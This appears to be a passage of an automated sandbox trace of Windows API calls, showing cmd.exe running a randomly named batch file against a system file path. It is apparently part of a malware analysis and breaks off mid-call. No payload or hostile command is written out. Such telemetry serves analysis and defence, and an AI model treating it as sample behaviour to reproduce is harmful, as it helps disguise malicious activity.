[0245.768] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0245.768] GetProcessHeap () returned 0x3c0000 [0245.768] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d2d58 | out: hHeap=0x3c0000) returned 1 [0245.768] GetEnvironmentStringsW () returned 0x3d2b30* [0245.768] GetProcessHeap () returned 0x3c0000 [0245.768] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb7e) returned 0x3d7278 [0245.769] FreeEnvironmentStringsW (penv=0x3d2b30) returned 1 [0245.769] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0247.755] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x39ef88 | out: lpExitCode=0x39ef88*=0x1) returned 1 [0247.755] CloseHandle (hObject=0x78) returned 1 [0247.756] _vsnwprintf (in: _Buffer=0x39f0d0, _BufferCount=0x13, _Format="%08X", _ArgList=0x39ef94 | out: _Buffer="00000001") returned 8 [0247.756] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0247.756] GetProcessHeap () returned 0x3c0000 [0247.757] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d7278 | out: hHeap=0x3c0000) returned 1 [0247.757] GetEnvironmentStringsW () returned 0x3d2b30* [0247.757] GetProcessHeap () returned 0x3c0000 [0247.757] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb7e) returned 0x3d7278 [0247.757] FreeEnvironmentStringsW (penv=0x3d2b30) returned 1 [0247.757] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0247.757] GetProcessHeap () returned 0x3c0000 [0247.757] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d7278 | out: hHeap=0x3c0000) returned 1 [0247.757] GetEnvironmentStringsW () returned 0x3d2b30* [0247.757] GetProcessHeap () returned 0x3c0000 [0247.757] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb7e) returned 0x3d7278 [0247.757] FreeEnvironmentStringsW (penv=0x3d2b30) returned 1 [0247.757] GetProcessHeap () returned 0x3c0000 [0247.757] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d00b0 | out: hHeap=0x3c0000) returned 1 [0247.757] DeleteProcThreadAttributeList (in: lpAttributeList=0x39efec | out: lpAttributeList=0x39efec) [0247.757] _get_osfhandle (_FileHandle=1) returned 0x80 [0247.757] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0247.758] _get_osfhandle (_FileHandle=1) returned 0x80 [0247.758] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0247.758] _get_osfhandle (_FileHandle=0) returned 0x3 [0247.758] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0247.758] SetConsoleInputExeNameW () returned 0x1 [0247.758] GetConsoleOutputCP () returned 0x1b5 [0247.758] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0247.758] SetThreadUILanguage (LangId=0x0) returned 0x409 [0247.758] exit (_Code=1) Process: id = "273" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x17fc4000" os_pid = "0x6a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 891 os_tid = 0x598 [0247.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfacc | out: lpSystemTimeAsFileTime=0x2bfacc*(dwLowDateTime=0x4920e240, dwHighDateTime=0x1d68287)) [0247.801] GetCurrentProcessId () returned 0x6a0 [0247.801] GetCurrentThreadId () returned 0x598 [0247.801] GetTickCount () returned 0x116890e [0247.801] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfac4 | out: lpPerformanceCount=0x2bfac4*=36814007944) returned 1 [0247.802] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0247.802] __set_app_type (_Type=0x1) [0247.802] __p__fmode () returned 0x770331f4 [0247.802] __p__commode () returned 0x770331fc [0247.802] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0247.803] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0247.803] GetCurrentThreadId () returned 0x598 [0247.803] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x598) returned 0x60 [0247.803] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0247.803] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0247.803] SetThreadUILanguage (LangId=0x0) returned 0x409 [0247.804] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0247.804] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2bfa5c | out: phkResult=0x2bfa5c*=0x0) returned 0x2 [0247.804] VirtualQuery (in: lpAddress=0x2bfa93, lpBuffer=0x2bfa2c, dwLength=0x1c | out: lpBuffer=0x2bfa2c*(BaseAddress=0x2bf000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0247.804] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x2bfa2c, dwLength=0x1c | out: lpBuffer=0x2bfa2c*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0247.804] VirtualQuery (in: lpAddress=0x1c1000, lpBuffer=0x2bfa2c, dwLength=0x1c | out: lpBuffer=0x2bfa2c*(BaseAddress=0x1c1000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0247.804] VirtualQuery (in: lpAddress=0x1c3000, lpBuffer=0x2bfa2c, dwLength=0x1c | out: lpBuffer=0x2bfa2c*(BaseAddress=0x1c3000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0247.804] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x2bfa2c, dwLength=0x1c | out: lpBuffer=0x2bfa2c*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x2, RegionSize=0x5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0247.804] GetConsoleOutputCP () returned 0x1b5 [0247.804] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0247.804] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0247.804] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.805] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0247.805] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.805] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0247.805] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.805] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0247.806] _get_osfhandle (_FileHandle=0) returned 0x3 [0247.806] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0247.806] _get_osfhandle (_FileHandle=0) returned 0x3 [0247.806] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0247.806] GetEnvironmentStringsW () returned 0x694070* [0247.806] GetProcessHeap () returned 0x680000 [0247.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xaca) returned 0x694b48 [0247.807] FreeEnvironmentStringsW (penv=0x694070) returned 1 [0247.807] GetProcessHeap () returned 0x680000 [0247.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x690d28 [0247.807] GetEnvironmentStringsW () returned 0x694070* [0247.807] GetProcessHeap () returned 0x680000 [0247.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xaca) returned 0x695620 [0247.808] FreeEnvironmentStringsW (penv=0x694070) returned 1 [0247.808] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be9cc | out: phkResult=0x2be9cc*=0x68) returned 0x0 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x0, lpData=0x2be9d8*=0x0, lpcbData=0x2be9d0*=0x1000) returned 0x2 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x1, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x0, lpData=0x2be9d8*=0x1, lpcbData=0x2be9d0*=0x1000) returned 0x2 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x0, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x40, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x40, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x0, lpData=0x2be9d8*=0x40, lpcbData=0x2be9d0*=0x1000) returned 0x2 [0247.808] RegCloseKey (hKey=0x68) returned 0x0 [0247.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be9cc | out: phkResult=0x2be9cc*=0x68) returned 0x0 [0247.808] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x0, lpData=0x2be9d8*=0x40, lpcbData=0x2be9d0*=0x1000) returned 0x2 [0247.809] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x1, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.809] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x0, lpData=0x2be9d8*=0x1, lpcbData=0x2be9d0*=0x1000) returned 0x2 [0247.809] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x0, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.809] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x9, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.809] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x4, lpData=0x2be9d8*=0x9, lpcbData=0x2be9d0*=0x4) returned 0x0 [0247.809] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be9d4, lpData=0x2be9d8, lpcbData=0x2be9d0*=0x1000 | out: lpType=0x2be9d4*=0x0, lpData=0x2be9d8*=0x9, lpcbData=0x2be9d0*=0x1000) returned 0x2 [0247.809] RegCloseKey (hKey=0x68) returned 0x0 [0247.809] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e30d [0247.809] srand (_Seed=0x5f51e30d) [0247.809] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\"\"" [0247.809] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\"\"" [0247.810] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0247.810] GetProcessHeap () returned 0x680000 [0247.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x694070 [0247.810] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x694078, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0247.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0247.811] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0247.811] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0247.811] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0247.811] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0247.811] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0247.811] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0247.811] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0247.811] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0247.811] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0247.811] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0247.811] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0247.811] GetProcessHeap () returned 0x680000 [0247.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x694b48 | out: hHeap=0x680000) returned 1 [0247.812] GetEnvironmentStringsW () returned 0x694288* [0247.812] GetProcessHeap () returned 0x680000 [0247.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xae2) returned 0x696be8 [0247.812] FreeEnvironmentStringsW (penv=0x694288) returned 1 [0247.812] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0247.812] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0247.812] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0247.812] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0247.812] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0247.812] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0247.812] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0247.812] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0247.812] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0247.812] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0247.812] GetProcessHeap () returned 0x680000 [0247.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x6976d8 [0247.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2bf798 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0247.813] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2bf798, lpFilePart=0x2bf794 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2bf794*="Desktop") returned 0x25 [0247.813] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0247.813] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2bf514 | out: lpFindFileData=0x2bf514*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x693ef0 [0247.813] FindClose (in: hFindFile=0x693ef0 | out: hFindFile=0x693ef0) returned 1 [0247.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2bf514 | out: lpFindFileData=0x2bf514*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x693ef0 [0247.813] FindClose (in: hFindFile=0x693ef0 | out: hFindFile=0x693ef0) returned 1 [0247.813] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0247.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2bf514 | out: lpFindFileData=0x2bf514*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x693ef0 [0247.814] FindClose (in: hFindFile=0x693ef0 | out: hFindFile=0x693ef0) returned 1 [0247.814] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0247.814] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0247.814] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0247.814] GetProcessHeap () returned 0x680000 [0247.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696be8 | out: hHeap=0x680000) returned 1 [0247.814] GetEnvironmentStringsW () returned 0x6960f8* [0247.814] GetProcessHeap () returned 0x680000 [0247.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb36) returned 0x697f38 [0247.814] FreeEnvironmentStringsW (penv=0x6960f8) returned 1 [0247.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0247.814] GetProcessHeap () returned 0x680000 [0247.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6976d8 | out: hHeap=0x680000) returned 1 [0247.815] GetProcessHeap () returned 0x680000 [0247.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400e) returned 0x698a78 [0247.815] GetProcessHeap () returned 0x680000 [0247.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xec) returned 0x694dc8 [0247.815] GetProcessHeap () returned 0x680000 [0247.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4008) returned 0x69ca90 [0247.816] GetProcessHeap () returned 0x680000 [0247.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4008) returned 0x6a0aa0 [0247.816] GetProcessHeap () returned 0x680000 [0247.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x698a78 | out: hHeap=0x680000) returned 1 [0247.816] GetConsoleOutputCP () returned 0x1b5 [0247.816] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0247.817] GetUserDefaultLCID () returned 0x409 [0247.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0247.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2bf8d8, cchData=128 | out: lpLCData="0") returned 2 [0247.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2bf8d8, cchData=128 | out: lpLCData="0") returned 2 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2bf8d8, cchData=128 | out: lpLCData="1") returned 2 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0247.818] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0247.818] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0247.820] GetProcessHeap () returned 0x680000 [0247.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20c) returned 0x694ec0 [0247.820] GetConsoleTitleW (in: lpConsoleTitle=0x694ec0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0247.821] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0247.821] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0247.821] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0247.821] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0247.822] GetProcessHeap () returned 0x680000 [0247.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400a) returned 0x698a78 [0247.822] GetProcessHeap () returned 0x680000 [0247.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x698a78 | out: hHeap=0x680000) returned 1 [0247.824] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0247.824] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0247.825] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0247.825] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0247.825] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0247.825] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0247.825] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0247.825] GetProcessHeap () returned 0x680000 [0247.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x58) returned 0x6950d8 [0247.825] GetProcessHeap () returned 0x680000 [0247.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x72) returned 0x690ee8 [0247.826] GetProcessHeap () returned 0x680000 [0247.826] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x7c) returned 0x695138 [0247.827] GetConsoleTitleW (in: lpConsoleTitle=0x2bf5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0247.828] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0247.829] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0247.829] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0247.829] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0247.829] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0247.829] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0247.829] _wcsicmp 